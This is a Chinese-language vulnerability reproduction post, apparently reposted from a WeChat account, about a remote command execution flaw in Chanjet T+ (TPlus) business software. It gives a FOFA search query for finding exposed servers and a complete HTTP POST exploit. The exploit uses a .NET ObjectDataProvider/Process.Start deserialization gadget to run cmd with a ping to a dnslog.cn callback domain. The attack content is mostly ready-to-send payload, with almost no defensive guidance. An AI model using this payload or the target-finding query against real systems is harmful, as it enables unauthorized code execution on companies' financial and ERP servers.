畅捷通TPlus Ufida.T.DI.UIP.ashx存在远程命令执行漏洞 附POC软件

1. 畅捷通TPlus Ufida.T.DI.UIP.ashx简介

微信公众号搜索：南风漏洞复现文库 该文章 南风漏洞复现文库 公众号首发

畅捷通T+专属云适用于需要一体化管理的企业，财务管理、业务管理、零售管理、生产管理、物流管理、移动仓管、营销管理、委外加工等人财货客一体化管理。

2.漏洞描述

畅捷通T+专属云适用于需要一体化管理的企业，财务管理、业务管理、零售管理、生产管理、物流管理、移动仓管、营销管理、委外加工等人财货客一体化管理。畅捷通TPlus存在远程命令执行漏洞。

CVE编号:

CNNVD编号:

CNVD编号:

3.影响版本

畅捷通T+

4.fofa查询语句

app="畅捷通-TPlus"

5.漏洞复现

漏洞链接：http://127.0.0.1/tplus/ajaxpro/Ufida.T.DI.UIP.RRA.RRATableController,Ufida.T.DI.UIP.ashx?method=GetStoreWarehouseByStore

漏洞数据包：

POST /tplus/ajaxpro/Ufida.T.DI.UIP.RRA.RRATableController,Ufida.T.DI.UIP.ashx?method=GetStoreWarehouseByStore HTTP/1.1
Host: 1270.0.1
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)
Accept: */*
Connection: Keep-Alive
Content-Length: 596
Content-Type: application/x-www-form-urlencoded
{
  "storeID":{
    "__type":"System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35",
    "MethodName":"Start",
    "ObjectInstance":{
        "__type":"System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
        "StartInfo": {
            "__type":"System.Diagnostics.ProcessStartInfo, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
            "FileName":"cmd", "Arguments":"/c ping bxcdpxepuriweudx.p2cnwz.dnslog.cn"
       }
    }
  }
}

原文始发于微信公众号（南风漏洞复现文库）：畅捷通TPlus Ufida.T.DI.UIP.ashx存在远程命令执行漏洞 附POC软件